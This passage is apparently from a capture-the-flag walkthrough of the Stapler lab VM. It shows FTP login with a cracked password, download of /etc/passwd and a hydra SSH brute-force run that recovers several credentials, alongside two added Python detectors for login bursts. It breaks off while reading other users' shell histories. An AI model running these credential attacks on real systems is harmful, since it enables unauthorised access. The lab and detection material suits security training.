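def is_login_attempt(rec):
    """True for a POST to a login endpoint; the path may carry a site prefix or a query string."""
    path = rec["path"].split("?", 1)[0]
    return rec["method"] == "POST" and path.endswith(LOGIN_PATHS)


def find_bruteforce(lines, threshold=20, window_seconds=60):
    """Return {ip: total_login_posts} for every client that exceeds `threshold`
    login POSTs inside any sliding window of `window_seconds`."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None and is_login_attempt(rec):
            per_ip[rec["ip"]].append(rec["ts"])

    flagged = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            # shrink the window from the left until it spans at most window_seconds
            while (stamps[end] - stamps[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 > threshold:
                flagged[ip] = len(stamps)
                break
    return flagged


def sample_log():
    """Constructed sample (hypothetical, not from the post): one client hammering
    wp-login.php, one client browsing and logging in normally, one junk line."""
    lines = [
        f'203.0.113.7 - - [27/Jun/2016:11:28:{i:02d} -0400] '
        f'"POST /blogblog/wp-login.php HTTP/1.1" 200 3125'
        for i in range(25)
    ]
    lines += [
        '10.0.0.5 - - [27/Jun/2016:11:28:10 -0400] "GET /blogblog/ HTTP/1.1" 200 9012',
        '10.0.0.5 - - [27/Jun/2016:11:29:00 -0400] "POST /blogblog/wp-login.php HTTP/1.1" 302 0',
        '10.0.0.5 - - [27/Jun/2016:11:29:05 -0400] "POST /blogblog/wp-login.php HTTP/1.1" 302 0',
        'not a log line at all',
    ]
    return lines


if __name__ == "__main__":
    for ip, count in find_bruteforce(sample_log()).items():
        print(f"possible brute force from {ip}: {count} login POSTs")
```

The sliding window, rather than a flat per-minute bucket, means a burst split across a minute boundary is still caught; a real deployment would feed `find_bruteforce` from the live log and pair the alert with rate limiting on the same two endpoints.<br />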
<br />
Ooh... elly was cracked with the password ylle.<br />
Let's switch back and try her credentials on the FTP service and see if we get lucky with some password reuse.<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~/Documents/Stapler# ftp 192.168.153.142</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Connected to 192.168.153.142.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220-</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220-|-----------------------------------------------------------------------------------------|</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220-| Harry, make sure to update the banner when you get a chance to show who has access here |</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220-|-----------------------------------------------------------------------------------------|</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220-</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">220</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Name (192.168.153.142:root): elly</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">331 Please specify the password.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Password:</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">230 Login successful.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Remote system type is UNIX.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Using binary mode to transfer files.</td></tr>
</tbody></table>
<br />
Bingo... but what can we see?<br />
Command: ls
<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">ftp> ls</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">200 PORT command successful. Consider using PASV.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">150 Here comes the directory listing.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 5 0 0 4096 Jun 03 13:51 X11</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 acpi</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 3028 Apr 20 23:09 adduser.conf</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 51 Jun 03 19:20 aliases</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 12288 Jun 03 19:20 aliases.db</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 07 01:57 alternatives</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 8 0 0 4096 Jun 03 17:46 apache2</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 apparmor</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 9 0 0 4096 Jun 06 23:17 apparmor.d</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 apport</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 6 0 0 4096 Jun 03 14:05 apt</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">14</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r----- 1 0 1 144 Jan 14 23:35 at.deny</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">15</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 5 0 0 4096 Jun 03 14:47 authbind</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">16</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 2188 Sep 01 2015 bash.bashrc</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">17</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 03 13:52 bash_completion.d</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">18</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 367 Jan 27 15:17 bindresvport.blacklist</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">19</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Apr 12 11:30 binfmt.d</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">20</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 03 13:51 byobu</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">21</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 3 0 0 4096 Jun 03 13:51 ca-certificates</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">22</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 7788 Jun 03 13:51 ca-certificates.conf</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">23</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 console-setup</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">24</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 03 19:13 cron.d</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">25</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 03 17:07 cron.daily</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">26</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 cron.hourly</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">27</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 cron.monthly</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">28</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 03 13:51 cron.weekly</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">29</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 722 Apr 05 22:59 crontab</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">30</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 54 Jun 03 13:51 crypttab</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">31</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 04 00:02 dbconfig-common</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">32</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 4 0 0 4096 Jun 03 13:51 dbus-1</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">33</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 2969 Nov 10 2015 debconf.conf</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">34</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 12 Apr 30 2015 debian_version</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">35</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 3 0 0 4096 Jun 05 23:04 default</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">36</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 604 Jul 02 2015 deluser.conf</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">37</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 03 13:49 depmod.d</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">38</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 4 0 0 4096 Jun 03 13:49 dhcp</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">39</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 26716 Jul 30 2015 dnsmasq.conf</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">40</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 2 0 0 4096 Jun 03 14:19 dnsmasq.d</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">41</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 4 0 0 4096 Jun 07 01:57 dpkg</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">42</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 96 Apr 20 23:09 environment</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">43</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">drwxr-xr-x 4 0 0 4096 Jun 03 14:18 fonts</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">44</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">-rw-r--r-- 1 0 0 594 Jun 03 13:49 fstab</td></tr>
</tbody></table>
<br />
The FTP root is /etc, lulz. Let's grab the passwd file and see if any of our potential users are actual local users.<br />
Command: get passwd<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">ftp> get passwd</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">local: passwd remote: passwd</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">200 PORT command successful. Consider using PASV.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">150 Opening BINARY mode data connection for passwd (2908 bytes).</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">226 Transfer complete.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">2908 bytes received in 0.00 secs (6.6826 MB/s)</td></tr>
</tbody></table>
Command: cat passwd | grep bash | cut -d':' -f1<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 10px;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">RNunemaker</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">ETollefson</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">DSwanger</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">AParnell</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">SHayslett</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">MBassin</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">JBare</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">LSolum</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">MFrei</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">SStroud</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">JKanode</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">11</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">CJoo</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">12</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Drew</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">13</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">jess</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">14</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">SHAY</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">15</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">mel</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">16</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">zoe</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">17</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">NATHAN</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre;">18</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">elly</td></tr>
</tbody></table>
<br />
Okay, time to let hydra do what it does best.<br />
Command: hydra -L Actual_Users -P /usr/share/john/password.lst ssh://192.168.153.142 -t 15 -u<br />
<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">root@lulb0x:~/Documents/Stapler# hydra -L Actual_Users -P /usr/share/wordlists/rockyou.txt ssh://192.168.153.142 -t 15 -u</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-27 13:19:14</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[DATA] max 15 tasks per 1 server, overall 64 tasks, 272543581 login tries (l:19/p:14344399), ~283899 tries per task</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[DATA] attacking service ssh on port 22</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[STATUS] 162.00 tries/min, 162 tries in 00:01h, 272543419 todo in 28039:27h, 15 active</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[22][ssh] host: 192.168.153.142 login: Drew password: qwerty</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[STATUS] 203.67 tries/min, 611 tries in 00:03h, 272542970 todo in 22303:02h, 15 active</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">10</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">[22][ssh] host: 192.168.153.142 login: JBare password: cookie</td></tr>
</tbody></table>
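From the defender's side of the same event, an added example that is not part of this write-up: a Python check that parses standard OpenSSH syslog lines, flags a source that fails 10 logins inside a minute, and escalates when that same source then gets an accepted password (the JBare:cookie result above). The log lines, the source address and the year are constructed for the example; the host name red is taken from the shell prompt later in the post.<br />

```python
"""Flag SSH password-guessing bursts in OpenSSH syslog lines.

Added example, not from the write-up. A guessing run like the hydra output
above leaves a dense trail of 'Failed password' lines from one source;
a following 'Accepted password' from that source means a guess landed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

YEAR = 2016           # assumed: classic syslog timestamps carry no year
THRESHOLD = 10        # failures from one source ...
WINDOW_SECONDS = 60   # ... inside this window trigger a burst alert

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def parse_ts(ts):
    """Turn 'Jun 27 13:19:15' into a datetime using the assumed YEAR."""
    return datetime.strptime(f"{YEAR} {' '.join(ts.split())}", "%Y %b %d %H:%M:%S")


def analyze(lines):
    """Return alerts: one 'burst' per source crossing THRESHOLD failures inside
    WINDOW_SECONDS, and a 'success_after_burst' when that source then logs in."""
    alerts = []
    recent = defaultdict(deque)        # ip -> failure timestamps inside the window
    total_failures = defaultdict(int)
    users_tried = defaultdict(set)
    burst_reported = set()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue                   # not a password-auth line; ignore
        ip, t = m["ip"], parse_ts(m["ts"])
        if m["result"] == "Failed":
            window = recent[ip]
            window.append(t)
            while (t - window[0]).total_seconds() > WINDOW_SECONDS:
                window.popleft()
            total_failures[ip] += 1
            users_tried[ip].add(m["user"])
            if len(window) >= THRESHOLD and ip not in burst_reported:
                burst_reported.add(ip)
                alerts.append({"severity": "medium", "event": "burst", "ip": ip,
                               "failures": len(window), "users": sorted(users_tried[ip])})
        elif total_failures[ip] >= THRESHOLD:
            # A valid login right after a guessing run means the password was
            # found; this is the outcome the hydra output above shows.
            alerts.append({"severity": "high", "event": "success_after_burst", "ip": ip,
                           "user": m["user"], "failures": total_failures[ip]})
    return alerts


# Constructed sample log: 12 guesses from one host, then a normal admin login
# from elsewhere (one typo, then success), then the guessing host gets in.
SRC = "192.168.153.1"  # constructed guessing host
GUESSED = ["RNunemaker", "ETollefson", "admin", "DSwanger", "AParnell", "SHayslett",
           "MBassin", "test", "JBare", "LSolum", "MFrei", "SStroud"]
SAMPLE_LOG = [
    f"Jun 27 13:19:{15 + i:02d} red sshd[{2000 + i}]: Failed password for "
    f"{'invalid user ' if u in ('admin', 'test') else ''}{u} from {SRC} port {40000 + i} ssh2"
    for i, u in enumerate(GUESSED)
] + [
    "Jun 27 13:19:30 red sshd[2100]: Failed password for peter from 10.0.0.5 port 51000 ssh2",
    "Jun 27 13:19:35 red sshd[2100]: Accepted password for peter from 10.0.0.5 port 51000 ssh2",
    f"Jun 27 13:19:40 red sshd[2200]: Accepted password for JBare from {SRC} port 40100 ssh2",
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```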
Using the credentials JBare:cookie<br />
Trying to cut some corners, since it seems that all the home folders are publicly readable....<br />
Command: cat */.bash_history
<br />
<table style="background-color: black; border-radius: 5px 5px; border: 1px solid; white-space: pre; width: 100%;">
<tbody>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">0</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">JBare@red:/home$ cat */.bash_history</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">1</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">2</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">free</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">3</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">4</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">5</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">6</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">7</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">8</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
<tr><td style="border-right: 1px solid; padding-left: 3px; padding-right: 3px; text-align: center; white-space: pre; width: 5px;">9</td><td style="padding-left: 3px; padding-right: 3px; white-space: pre;">exit</td></tr>
